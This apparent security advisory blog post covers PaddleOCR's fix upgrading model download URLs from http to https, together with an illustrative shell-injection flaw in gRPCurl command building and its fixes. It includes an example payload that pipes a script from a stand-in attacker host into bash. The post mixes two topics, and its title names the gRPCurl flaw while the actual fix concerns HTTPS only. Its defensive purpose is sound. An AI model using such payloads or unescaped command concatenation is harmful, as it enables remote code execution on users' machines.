High severity · 7 min read

Shell Injection via Unsafe String Concatenation in gRPCurl Command Generation

A high-severity vulnerability was discovered in PaddleOCR's deployment configuration where model download URLs were specified using unencrypted `http://`, exposing users to man-in-the-middle attacks that could allow an attacker to intercept and replace model files with malicious ones. The fix upgrades all model download URLs to use `https://`, ensuring encrypted transmission and integrity of the downloaded files. This change is a critical security baseline for any application that downloads bina

By orbisai0security
May 28, 2026


Introduction

When we think about application security, we often focus on the obvious attack surfaces — login forms, API endpoints, user inputs. But some of the most dangerous vulnerabilities hide in plain sight: in configuration files, in helper scripts, and in the small decisions developers make when wiring systems together.

This post examines a high-severity vulnerability found in PaddleOCR's deployment configuration — specifically, the use of unencrypted http:// URLs for downloading machine learning model files. While this might seem like a minor oversight, the consequences can be severe: a network-positioned attacker can silently replace legitimate model files with malicious ones, potentially turning your OCR pipeline into a backdoor.

We'll also explore the broader context of shell injection via unsafe string concatenation in gRPCurl command generation — a related attack pattern that developers working with gRPC tooling must understand.


The Vulnerability Explained

What Went Wrong?

The vulnerability lives in deploy/hubserving/ocr_system/params.py, the configuration module for PaddleOCR's serving infrastructure. The original code specified model download URLs using plain http://:

# VULNERABLE: Unencrypted HTTP download URLs
cfg.det_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
cfg.rec_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
cfg.cls_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"

At the same time, the related gRPCurl command generation code uses unsafe string concatenation to build shell commands from user-controlled values — including headers, endpoints, and data pulled from API responses — without any shell escaping. This means an attacker who can influence those values can inject shell metacharacters.

Two Vulnerabilities, One Root Cause: Insufficient Input Handling

These two issues share a common theme: trusting external data without sanitization or secure transport.

  1. HTTP model downloads: plain HTTP provides neither encryption nor integrity protection, so anyone on the network path (coffee shop Wi-Fi, shared cloud VPC, compromised router) can perform a man-in-the-middle (MitM) attack.

  2. Shell injection in gRPCurl commands: when user-controlled strings from API responses are interpolated directly into shell command strings, attackers can break out of the intended command structure.

How Could It Be Exploited?

Attack Scenario 1: Model File Poisoning via HTTP MitM

Imagine a developer or automated CI/CD pipeline running PaddleOCR's model download script on a shared cloud network:

Developer Machine ──HTTP──► [ATTACKER in the middle] ──► Model Server
                                      │
                                      ▼
                         Serves malicious .tar file
                         containing backdoored model

Because the download uses plain http://, there is:
- No encryption — the attacker can read the traffic
- No integrity check at the transport layer — the attacker can modify the response
- No certificate validation — the client has no way to verify the server's identity

The attacker serves a .tar file that, when extracted, contains either a model file crafted to exploit deserialization vulnerabilities or an __init__.py that executes arbitrary code when the model is loaded.

Attack Scenario 2: Shell Injection via gRPCurl Command Generation

Consider a helper function that builds a grpcurl command for users to copy and run:

# VULNERABLE pattern (illustrative)
def build_grpcurl_command(endpoint, header, data):
    cmd = f"grpcurl -H '{header}' -d '{data}' {endpoint} service.Method"
    return cmd

Suppose data comes from an API response or user input and contains:

'; curl http://attacker.com/shell.sh | bash; echo '

The generated command becomes:

grpcurl -H 'Authorization: Bearer token' -d ''; curl http://attacker.com/shell.sh | bash; echo '' endpoint service.Method

When the user pastes and runs this command, arbitrary code executes on their machine.
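To see why the shell treats the payload as separate commands, the sketch below rebuilds the illustrative command and tokenizes it with Python's shlex module in punctuation-aware mode. The helper names and the localhost:50051 endpoint are assumptions made for this demo, and nothing is executed.

```python
import shlex


def build_grpcurl_command_unsafe(endpoint: str, header: str, data: str) -> str:
    """Illustrative vulnerable builder: values are pasted between literal quotes."""
    return f"grpcurl -H '{header}' -d '{data}' {endpoint} service.Method"


def shell_like_tokens(command: str) -> list[str]:
    """Approximate how a POSIX shell splits a line, keeping ; and | as tokens."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


payload = "'; curl http://attacker.com/shell.sh | bash; echo '"
command = build_grpcurl_command_unsafe(
    "localhost:50051",  # hypothetical endpoint for the demo
    "Authorization: Bearer token",
    payload,
)
tokens = shell_like_tokens(command)

# The payload's first quote closes the -d argument early, so the separators
# land outside any quoting and a shell would treat them as command boundaries.
print(tokens)
print("unquoted separators:", [t for t in tokens if t in {";", "|"}])
```

Any `;` or `|` that shows up as its own token sits outside quoting, which is exactly where a shell interprets it as a command separator or pipe.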

Real-World Impact

| Risk | Description |
|---|---|
| Model Integrity | Poisoned models can produce incorrect OCR results, enabling fraud or bypassing security checks |
| Code Execution | Malicious model files can execute code during loading via unsafe deserialization |
| Supply Chain Attack | Compromised models distributed to all users of the system |
| Shell Code Execution | Injected shell commands run with the privileges of the user who pastes the gRPCurl command |

The Fix

What Changed?

The fix is elegantly simple — all three model download URLs were upgraded from http:// to https://:

- cfg.det_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
- cfg.rec_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
- cfg.cls_model_url = "http://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"

+ cfg.det_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_det_infer.tar"
+ cfg.rec_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_pp-ocrv2_rec_infer.tar"
+ cfg.cls_model_url = "https://paddle-ocr-models.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_cls_infer.tar"

Why This Works

HTTPS provides three critical security properties that HTTP lacks:

  1. Confidentiality: TLS encryption prevents eavesdropping on the download
  2. Integrity: TLS authenticates every record (with a MAC or an AEAD tag), so tampering in transit is detected
  3. Authentication: certificate validation ensures you're talking to the real server, not an impersonator
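The authentication property only holds if the client actually validates certificates. The source does not show which HTTP client performs the download, so as a small check under the assumption that it relies on Python's standard ssl defaults, the default client context can be inspected like this:

```python
import ssl

# Default client-side TLS context from the standard library.
context = ssl.create_default_context()

# CERT_REQUIRED: the handshake fails unless the server presents a trusted certificate.
print(context.verify_mode == ssl.CERT_REQUIRED)

# check_hostname: the certificate must also match the host being contacted.
print(context.check_hostname)
```

Turning either setting off (for example by passing verify=False to requests) gives up the authentication property and reopens the MitM window that the https:// upgrade is meant to close.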

Fixing Shell Injection: The Right Approach

For the gRPCurl command generation issue, the fix requires proper shell escaping. Here's how to do it safely in Python:

import shlex

# SAFE: Use shlex.quote() to escape all user-controlled values
def build_grpcurl_command(endpoint, header, data):
    safe_header = shlex.quote(header)
    safe_data = shlex.quote(data)
    safe_endpoint = shlex.quote(endpoint)

    cmd = f"grpcurl -H {safe_header} -d {safe_data} {safe_endpoint} service.Method"
    return cmd

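shlex.quote() wraps the string in single quotes and escapes any single quotes inside it, so a POSIX shell reads the whole value as one literal argument and its metacharacters lose their special meaning. Note that shlex.quote() is designed for POSIX shells; it is not guaranteed to be correct for other shells such as cmd.exe on Windows.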
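As a quick sanity check of the quoting approach, the sketch below quotes every part of the command and then splits the result the way a POSIX shell would. The function name and the localhost:50051 endpoint are hypothetical; nothing is executed.

```python
import shlex


def build_grpcurl_command_quoted(endpoint: str, header: str, data: str) -> str:
    """Quote every value so a POSIX shell reads each one as a single argument."""
    parts = ["grpcurl", "-H", header, "-d", data, endpoint, "service.Method"]
    return " ".join(shlex.quote(part) for part in parts)


payload = "'; curl http://attacker.com/shell.sh | bash; echo '"
command = build_grpcurl_command_quoted(
    "localhost:50051",  # hypothetical endpoint for the demo
    "Authorization: Bearer token",
    payload,
)
print(command)

# Splitting the command with POSIX rules recovers the payload intact,
# as the single argument to -d rather than as extra commands.
args = shlex.split(command)
print(args[4] == payload)
```

The round trip through shlex.split() is a convenient unit test for any command generator: if a hostile value does not come back as exactly one argument, the quoting is wrong.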

Even better — avoid shell commands entirely when possible:

import subprocess

# BEST: Use subprocess with a list of arguments (no shell=True)
def run_grpcurl(endpoint, header, data):
    result = subprocess.run(
        ["grpcurl", "-H", header, "-d", data, endpoint, "service.Method"],
        capture_output=True,
        text=True,
        shell=False  # Never use shell=True with user input
    )
    return result.stdout

When you pass a list of arguments to subprocess.run() with shell=False, each list element is handed to the program as a separate argument without being parsed by a shell, so there is no shell to inject into.
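The effect of the list form can be observed without installing grpcurl. In this sketch a small Python child process stands in for the real binary (an assumption made purely so the demo runs anywhere) and reports the arguments it received:

```python
import json
import subprocess
import sys

payload = "'; curl http://attacker.com/shell.sh | bash; echo '"

# Stand-in child process: it only echoes its arguments back as JSON.
child_code = "import json, sys; print(json.dumps(sys.argv[1:]))"

result = subprocess.run(
    [sys.executable, "-c", child_code, payload],
    capture_output=True,
    text=True,
    check=True,  # raise CalledProcessError if the child exits with an error
)
received = json.loads(result.stdout)

# The payload arrives as one argv element; no shell ever parsed it.
print(received == [payload])
```

One caveat remains with the list form: a value that begins with a dash may still be interpreted as an option by the target program, so validating values such as the endpoint is still worthwhile.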


Prevention & Best Practices

1. Always Use HTTPS for Downloading Artifacts

This is a non-negotiable baseline for any production system:

# ❌ Never do this
url = "http://example.com/model.tar"

# ✅ Always do this
url = "https://example.com/model.tar"
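A convention like this is easier to keep when code enforces it. The following is a minimal sketch of a guard that a download helper could call first; require_https is a hypothetical name, not something taken from PaddleOCR.

```python
from urllib.parse import urlsplit


def require_https(url: str) -> str:
    """Return the URL unchanged if it uses https, otherwise raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme != "https" or not parts.netloc:
        raise ValueError(f"Refusing non-HTTPS download URL: {url!r}")
    return url


require_https("https://example.com/model.tar")  # accepted

try:
    require_https("http://example.com/model.tar")
except ValueError as exc:
    print(exc)
```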

Go further by also verifying checksums after download:

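import hashlib
import os

import requests

def download_and_verify(url: str, expected_sha256: str, dest_path: str) -> str:
    # Stream the download; the timeout keeps a stalled server from hanging the caller
    response = requests.get(url, stream=True, timeout=30)
    response.raise_for_status()

    # Hash the bytes while writing them so the data is only read once
    sha256 = hashlib.sha256()
    with open(dest_path, 'wb') as f:
        for chunk in response.iter_content(chunk_size=8192):
            f.write(chunk)
            sha256.update(chunk)

    actual = sha256.hexdigest()
    if actual != expected_sha256.lower():
        os.remove(dest_path)  # do not leave an unverified file on disk
        raise ValueError(f"Checksum mismatch! Expected {expected_sha256}, got {actual}")

    return dest_path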
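The expected digest has to come from somewhere trustworthy, typically a copy of the artifact obtained and reviewed once, with the value then pinned in configuration. A minimal sketch of computing that value follows; sha256_of_file is a hypothetical helper and the temporary file merely stands in for a real model archive.

```python
import hashlib
import os
import tempfile


def sha256_of_file(path: str, chunk_size: int = 8192) -> str:
    """Hash a file in chunks so large model archives need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


# Demo on a throwaway file standing in for a trusted copy of the archive.
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"example archive bytes")

print(sha256_of_file(tmp.name))
os.remove(tmp.name)
```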

2. Never Use String Concatenation for Shell Commands

| Approach | Safety | Recommendation |
|---|---|---|
| os.system(f"cmd {user_input}") | ❌ Dangerous | Never use |
| subprocess.run(cmd_string, shell=True) | ❌ Dangerous | Avoid with user input |
| subprocess.run([...], shell=False) | ✅ Safe | Preferred |
| shlex.quote() + string | ⚠️ Acceptable | Use when list form isn't possible |

3. Treat All External Data as Untrusted

Values from API responses, configuration files, environment variables, and network responses should all be treated as potentially hostile:

import re

# Validate and sanitize before use
def validate_endpoint(endpoint: str) -> str:
    # Only allow valid hostname:port patterns.
    # fullmatch() is used because '$' with match() would also accept a trailing newline.
    pattern = r'[a-zA-Z0-9.-]+:\d{1,5}'
    if not re.fullmatch(pattern, endpoint):
        raise ValueError(f"Invalid endpoint format: {endpoint!r}")
    return endpoint
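A pattern check like this can be tightened a little further. The sketch below is a hypothetical stricter variant (not from the original fix) that also rejects a leading dash, which a command-line tool could mistake for an option, and enforces the valid port range:

```python
import re

# Host must start with an alphanumeric character; the port is captured for a range check.
_ENDPOINT_RE = re.compile(r"[a-zA-Z0-9][a-zA-Z0-9.-]*:(\d{1,5})")


def validate_endpoint_strict(endpoint: str) -> str:
    """Accept only host:port with a port in 1..65535."""
    match = _ENDPOINT_RE.fullmatch(endpoint)
    if match is None or not 1 <= int(match.group(1)) <= 65535:
        raise ValueError(f"Invalid endpoint format: {endpoint!r}")
    return endpoint


candidates = [
    "localhost:50051",
    "localhost:50051\n",   # trailing newline
    "-x:1",                # would look like an option to a CLI
    "host:99999",          # port out of range
    "host:80; rm -rf ~",   # shell metacharacters
]
for candidate in candidates:
    try:
        validate_endpoint_strict(candidate)
        print(f"accepted {candidate!r}")
    except ValueError:
        print(f"rejected {candidate!r}")
```

Allow-listing the expected shape of a value tends to age better than trying to enumerate dangerous characters.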

4. Security Scanning Tools

Integrate these tools into your CI/CD pipeline to catch these issues automatically:

  • Bandit: Python security linter that flags shell=True, os.system() calls, unaudited urlopen() calls, and other risky patterns
  • Safety: checks Python dependencies for known vulnerabilities
  • Semgrep: static analysis with rules for shell injection, insecure URLs, and more
  • Trivy: container and filesystem scanning for misconfigurations

# Run Bandit on your codebase (-ll reports medium severity and above)
pip install bandit
bandit -r deploy/ -ll

# Example of a related finding. Note that B310 is raised for urlopen() calls,
# not for http:// string literals in a configuration file:
# >> Issue: [B310:urllib_urlopen] Audit url open for permitted schemes.
#    Allowing use of file:/ or custom schemes is often unexpected.
#    Severity: Medium   Confidence: High
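Because general-purpose linters may not flag a plain http:// string sitting in a configuration module, a small custom check can complement them. This is a minimal sketch with a hypothetical function name and sample input, intended as a starting point for a CI step and not as a replacement for the tools above:

```python
import re

# Matches cleartext http:// URLs up to the next quote, bracket, or whitespace.
_HTTP_URL_RE = re.compile(r"""http://[^\s"'<>]+""")


def find_insecure_urls(source: str) -> list[tuple[int, str]]:
    """Return (line_number, url) pairs for cleartext http:// URLs in source text."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in _HTTP_URL_RE.finditer(line):
            findings.append((lineno, match.group(0)))
    return findings


sample = '''cfg.det_model_url = "http://example.com/det.tar"
cfg.rec_model_url = "https://example.com/rec.tar"
'''
for lineno, url in find_insecure_urls(sample):
    print(f"line {lineno}: {url}")
```

A CI job could run such a check over the deployment directory and fail the build when the list of findings is non-empty.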

5. Relevant Security Standards

  • CWE-78: Improper Neutralization of Special Elements used in an OS Command (OS Command Injection)
  • CWE-319: Cleartext Transmission of Sensitive Information
  • OWASP A03:2021: Injection — covers shell injection and command injection
  • OWASP A02:2021: Cryptographic Failures — covers insecure HTTP transmission

Conclusion

This vulnerability is a reminder that security is in the details. One character, the s that turns http into https, stands between a secure model download pipeline and a potential supply chain attack. Similarly, one function call, shlex.quote() or a switch to subprocess.run() with an argument list, is the difference between a safe CLI helper and a remote code execution vector.

Key Takeaways

  • 🔒 Always use HTTPS for downloading any external files, especially binary artifacts like ML models
  • 🧹 Never concatenate user-controlled strings into shell commands — use shlex.quote() or argument lists
  • 🔍 Treat all external data as untrusted, including API response values used in command generation
  • 🤖 Automate security scanning with tools like Bandit and Semgrep to catch these patterns in CI/CD
  • Verify checksums of downloaded files to add a second layer of integrity protection beyond TLS

Security isn't about writing perfect code — it's about building habits and systems that make the secure choice the easy choice. Upgrading a URL scheme and using proper escaping functions are exactly the kind of small, high-impact changes that make software meaningfully safer.

Stay secure, and keep shipping. 🛡️

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #17289
